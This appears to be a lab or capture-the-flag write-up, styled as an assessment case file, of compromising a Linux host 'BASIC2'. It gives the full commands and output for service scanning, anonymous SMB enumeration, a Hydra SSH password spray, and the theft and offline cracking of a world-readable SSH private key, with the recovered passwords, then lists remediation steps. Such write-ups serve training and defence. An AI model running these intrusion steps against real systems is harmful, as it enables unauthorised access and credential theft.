Case file

SMB user leak, SSH spray, and world-readable private key

Linux assessment of BASIC2: anonymous Samba and a public /development path disclosed staff identities; Hydra recovered jan’s SSH password; kay’s world-readable id_rsa was cracked offline for lateral movement.

Foundations26 minLinux · SMB · SSH · Credential Access
01

Engagement summary

We mapped SSH, Apache, Samba, and Tomcat, then chained anonymous share data and weak SSH credentials into a second user via an unprotected encrypted private key.

Target BASIC2 (10.10.50.222) presented a classic small-business Linux footprint. Anonymous SMB and a world-readable web development directory leaked staff names. Password spraying against jan succeeded with a weak password. kay’s home directory exposed a world-readable SSH private key; offline cracking of the key passphrase completed lateral movement and revealed a password backup file.

Business impact

Anonymous file shares and overly permissive home directories turned username disclosure into interactive access. Enforce authenticated SMB, remove public staff notes from web roots, chmod 600 private keys, and enforce passphrase strength on SSH keys.

02

Host and service discovery

Full TCP scan with version detection against 10.10.50.222.

Aggressive service scan

OPERATOR · NMAP

savvy@lab:~$ sudo nmap 10.10.50.222 -sV -p- -A -sS -T4

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

139/tcp open netbios-ssn Samba smbd 3.X - 4.X

445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

8080/tcp open http Apache Tomcat 9.0.7

Host: BASIC2

03

Web and SMB intelligence

dirsearch found /development/. Anonymous Samba exposed staff.txt naming jan and kay.

Web path discovery

OPERATOR · DIRSEARCH

savvy@lab:~$ dirsearch -u 10.10.50.222

[20:31:23] 200 - 475B - /development/

Staff notes under /development/ referenced users k/j (kay/jan) and weak credential hygiene. We confirmed the same identities via Samba.

Anonymous share listing and staff.txt

OPERATOR · SMB

savvy@lab:~$ smbclient -L 10.10.50.222

Anonymous Disk

IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)

savvy@lab:~$ smbclient //10.10.50.222/Anonymous

smb: \> get staff.txt

savvy@lab:~$ cat staff.txt

Announcement to staff:

PLEASE do not upload non-work-related items to this share.

(This means you too, Jan!)

-Kay

04

SSH password spray — user jan

Hydra against jan with rockyou recovered password armando.

SSH spray for jan

OPERATOR · HYDRA

savvy@lab:~$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.50.222 -t 50

[22][ssh] host: 10.10.50.222 login: jan password: armando

savvy@lab:~$ ssh jan@10.10.50.222

savvy@lab:~$

05

Lateral movement via kay’s private key

kay’s .ssh/id_rsa was world-readable. We exfiltrated it, cracked the passphrase with john (beeswax), and authenticated as kay.

Permissions on kay’s SSH material

OPERATOR · LOCAL ENUM

savvy@lab:/home/kay/.ssh$ ls -la

-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa

-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub

-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys

Offline crack of encrypted id_rsa

OPERATOR · JOHN

savvy@lab:~$ ssh2john id_rsa > rsa

savvy@lab:~$ john rsa -w=/usr/share/wordlists/rockyou.txt

beeswax (id_rsa)

savvy@lab:~$ chmod 600 id_rsa

savvy@lab:~$ ssh kay@10.10.50.222 -i id_rsa

savvy@lab:~$

savvy@lab:~$ cat pass.bak

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Remediation

Disable anonymous Samba, remove staff identity from public web paths, set private keys to 0600 owned by the user, require strong key passphrases, and rotate any credentials recovered from pass.bak.